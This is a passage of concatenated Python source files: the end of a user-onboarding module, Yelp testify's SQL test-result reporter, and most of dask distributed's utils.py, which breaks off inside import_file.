user.update(cohort_id=access_code["cohort_id"], access_code=access_code[ID_KEY])
user.set_status(Status.active)
access_code["user"] = user["phonenum"]
access_code.save()
onboard_user(user, curr_time)
return user
def new_user_via_admin_portal(phonenum, cohort_id, curr_time, delay=True):
try:
user = User.retrieve(phonenum=phonenum, cohort_id=cohort_id)
# if phone number is invalid
except BadPhoneNumberError:
raise_400_error("Invalid phone number.")
except DatabaseConflictError:
# alert engineering to this potential problem
log_warning(("Multiple users were returned for User.retrieve() via new_user_via_admin_portal():\n\n" +
"Phone Number: %s\nCohort ID: %s\n Current Time: %s" % (phonenum, cohort_id, curr_time)))
# alert admin user to not being able to create new user
raise_400_error("A user with phone number '%s' already exists." % phone_humanize(phonenum))
# if user already exists, raise error
if user:
raise_400_error("A user with phone number '%s' already exists." % phone_humanize(phonenum))
else:
cohort = validate_cohort(cohort_id)
user = User.create(phonenum, cohort[ID_KEY], status=Status.active)
onboard_user(user, curr_time, delay)
return user
def onboard_user(user, curr_time, delay=True):
if user.is_active() and user.cohort_is_active(): # cohort status is checked every time, so TODO: optimize
thread = Thread(target=_onboard_user_core, args=(user, curr_time, delay))
thread.start()
if not delay:
thread.join()
def _onboard_user_core(user, curr_time, delay):
send_welcome(user)
user.update(onboarded=True)
run_on_user_creation_schedules(user, curr_time, delay=delay)
|
sql_reporter.py
|
# Copyright 2009 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
import sqlalchemy as SA
from testify import test_reporter
try:
import simplejson as json
_hush_pyflakes = [json]
del _hush_pyflakes
except ImportError:
import json
import yaml
import time
import threading
import Queue
metadata = SA.MetaData()
Tests = SA.Table('tests', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('module', SA.String(255)),
SA.Column('class_name', SA.String(255)),
SA.Column('method_name', SA.String(255)),
)
SA.Index('ix_individual_test', Tests.c.module, Tests.c.class_name, Tests.c.method_name, unique=True)
Failures = SA.Table('failures', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('error', SA.Text, nullable=False),
SA.Column('traceback', SA.Text, nullable=False),
SA.Column('hash', SA.String(40), unique=True, nullable=False),
)
Builds = SA.Table('builds', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('buildbot', SA.Integer, nullable=False),
SA.Column('buildnumber', SA.Integer, nullable=False),
SA.Column('buildname', SA.String(40), nullable=False),
SA.Column('branch', SA.String(255), index=True, nullable=False),
SA.Column('revision', SA.String(40), index=True, nullable=False),
SA.Column('end_time', SA.Integer, index=True, nullable=True),
SA.Column('run_time', SA.Float, nullable=True),
SA.Column('method_count', SA.Integer, nullable=True),
SA.Column('submit_time', SA.Integer, index=True, nullable=True),
SA.Column('discovery_failure', SA.Boolean, default=False, nullable=True),
)
SA.Index('ix_individual_run', Builds.c.buildbot, Builds.c.buildname, Builds.c.buildnumber, Builds.c.revision, unique=True)
TestResults = SA.Table('test_results', metadata,
SA.Column('id', SA.Integer, primary_key=True, autoincrement=True),
SA.Column('test', SA.Integer, index=True, nullable=False),
SA.Column('failure', SA.Integer, index=True),
SA.Column('build', SA.Integer, index=True, nullable=False),
SA.Column('end_time', SA.Integer, index=True, nullable=False),
SA.Column('run_time', SA.Float, index=True, nullable=False),
SA.Column('runner_id', SA.String(255), index=True, nullable=True),
SA.Column('previous_run', SA.Integer, index=False, nullable=True),
)
SA.Index('ix_build_test_failure', TestResults.c.build, TestResults.c.test, TestResults.c.failure)
def md5(s):
return hashlib.md5(s.encode('utf8') if isinstance(s, unicode) else s).hexdigest()
class SQLReporter(test_reporter.TestReporter):
def __init__(self, options, *args, **kwargs):
dburl = options.reporting_db_url or SA.engine.url.URL(**yaml.safe_load(open(options.reporting_db_config)))
create_engine_opts = kwargs.pop('create_engine_opts', {
'poolclass' : kwargs.pop('poolclass', SA.pool.NullPool),
'pool_recycle' : 3600,
})
self.engine = SA.create_engine(dburl, **create_engine_opts)
self.conn = self.engine.connect()
metadata.create_all(self.engine)
self.build_id = self.create_build_row(options.build_info)
self.start_time = time.time()
# Cache of (module,class_name,method_name) => test id
self.test_id_cache = dict(
((row[Tests.c.module], row[Tests.c.class_name], row[Tests.c.method_name]), row[Tests.c.id])
for row in self.conn.execute(Tests.select())
)
self.result_queue = Queue.Queue()
self.ok = True
self.reporting_frequency = options.sql_reporting_frequency
self.batch_size = options.sql_batch_size
self.reporting_thread = threading.Thread(target=self.report_results)
self.reporting_thread.daemon = True
self.reporting_thread.start()
super(SQLReporter, self).__init__(options, *args, **kwargs)
def create_build_row(self, build_info):
if not build_info:
raise ValueError("Build info must be specified when reporting to a database.")
info_dict = json.loads(build_info)
results = self.conn.execute(Builds.insert({
'buildbot' : info_dict['buildbot'],
'buildnumber' : info_dict['buildnumber'],
'branch' : info_dict['branch'],
'revision' : info_dict['revision'],
'submit_time' : info_dict.get('submitstamp'),
'buildname' : info_dict['buildname'],
}))
return results.lastrowid
def test_counts(self, test_case_count, test_method_count):
"""Store the number of tests so we can determine progress."""
self.conn.execute(SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'method_count' : test_method_count,
}
))
def test_complete(self, result):
"""Insert a result into the queue that report_results pulls from."""
self.result_queue.put(result)
def test_discovery_failure(self, exc):
"""Set the discovery_failure flag to True."""
self.conn.execute(SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'discovery_failure' : True,
}
))
def report_results(self):
"""A worker func that runs in another thread and reports results to the database.
Create a TestResults row from a test result dict. Also inserts the previous_run row."""
def create_row_to_insert(result, previous_run_id=None):
return {
'test' : get_test_id(result['method']['module'], result['method']['class'], result['method']['name']),
'failure' : get_failure_id(result['exception_info']),
'build' : self.build_id,
'end_time' : result['end_time'],
'run_time' : result['run_time'],
'runner_id' : result['runner_id'],
'previous_run' : previous_run_id,
}
def get_test_id(module, class_name, method_name):
"""Get the ID of the Tests row that corresponds to this test. If the row doesn't exist, insert one"""
cached_result = self.test_id_cache.get((module, class_name, method_name), None)
if cached_result is not None:
return cached_result
query = SA.select(
[Tests.c.id],
SA.and_(
Tests.c.module == module,
Tests.c.class_name == class_name,
Tests.c.method_name == method_name,
)
)
# Most of the time, the Tests row will already exist for this test (it's been run before.)
row = conn.execute(query).fetchone()
if row:
return row[Tests.c.id]
else:
# Not there (this test hasn't been run before); create it
results = conn.execute(Tests.insert({
'module' : module,
'class_name' : class_name,
'method_name' : method_name,
}))
# and then return it.
return results.lastrowid
def get_failure_id(exception_info):
"""Get the ID of the failure row for the specified exception."""
if not exception_info:
return None
exc_hash = md5(''.join(exception_info))
query = SA.select(
[Failures.c.id],
Failures.c.hash == exc_hash,
)
row = conn.execute(query).fetchone()
if row:
return row[Failures.c.id]
else:
# We haven't inserted this row yet; insert it and re-query.
results = conn.execute(Failures.insert({
'hash' : exc_hash,
'error' : exception_info[-1].strip(),
'traceback': ''.join(exception_info),
}))
return results.lastrowid
def insert_single_run(result):
"""Recursively insert a run and its previous runs."""
previous_run_id = insert_single_run(result['previous_run']) if result['previous_run'] else None
results = conn.execute(TestResults.insert(create_row_to_insert(result, previous_run_id=previous_run_id)))
return results.lastrowid
conn = self.engine.connect()
while True:
results = []
# Block until there's a result available.
results.append(self.result_queue.get())
# Grab any more tests that come in during the next self.reporting_frequency seconds.
time.sleep(self.reporting_frequency)
try:
while True:
results.append(self.result_queue.get_nowait())
except Queue.Empty:
pass
# Insert any previous runs, if necessary.
for result in filter(lambda x: x['previous_run'], results):
try:
result['previous_run_id'] = insert_single_run(result['previous_run'])
except Exception, e:
logging.error("Exception while reporting results: " + repr(e))
self.ok = False
chunks = (results[i:i+self.batch_size] for i in xrange(0, len(results), self.batch_size))
for chunk in chunks:
try:
conn.execute(TestResults.insert(),
[create_row_to_insert(result, result.get('previous_run_id', None)) for result in chunk]
)
except Exception, e:
logging.error("Exception while reporting results: " + repr(e))
self.ok = False
finally:
# Do this in finally so we don't hang at report() time if we get errors.
for _ in xrange(len(chunk)):
self.result_queue.task_done()
def report(self):
self.end_time = time.time()
self.result_queue.join()
query = SA.update(Builds,
whereclause=(Builds.c.id == self.build_id),
values={
'end_time' : self.end_time,
'run_time' : self.end_time - self.start_time,
}
)
self.conn.execute(query)
return self.ok
# Hooks for plugin system
def add_command_line_options(parser):
parser.add_option("--reporting-db-config", action="store", dest="reporting_db_config", type="string", default=None, help="Path to a yaml file describing the SQL database to report into.")
parser.add_option('--reporting-db-url', action="store", dest="reporting_db_url", type="string", default=None, help="The URL of a SQL database to report into.")
parser.add_option("--build-info", action="store", dest="build_info", type="string", default=None, help="A JSON dictionary of information about this build, to store in the reporting database.")
parser.add_option("--sql-reporting-frequency", action="store", dest="sql_reporting_frequency", type="float", default=1.0, help="How long to wait between SQL inserts, at a minimum")
parser.add_option("--sql-batch-size", action="store", dest="sql_batch_size", type="int", default="500", help="Maximum number of rows to insert at any one time")
def build_test_reporters(options):
if options.reporting_db_config or options.reporting_db_url:
return [SQLReporter(options)]
else:
return []
# vim: set ts=4 sts=4 sw=4 et:
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if PY3 and not sys.platform.startswith("win") and "PyPy" not in sys.version:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, "func"):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s" % (host, default, e),
RuntimeWarning,
)
return default
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default="127.0.0.1")
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default="::1")
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
@gen.coroutine
def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
timeout = kwargs.pop("callback_timeout", None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
try:
from functools import lru_cache
except ImportError:
lru_cache = False
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return x
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec(
"""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
"""
)
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, "encode"):
return s.encode()
raise TypeError("Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
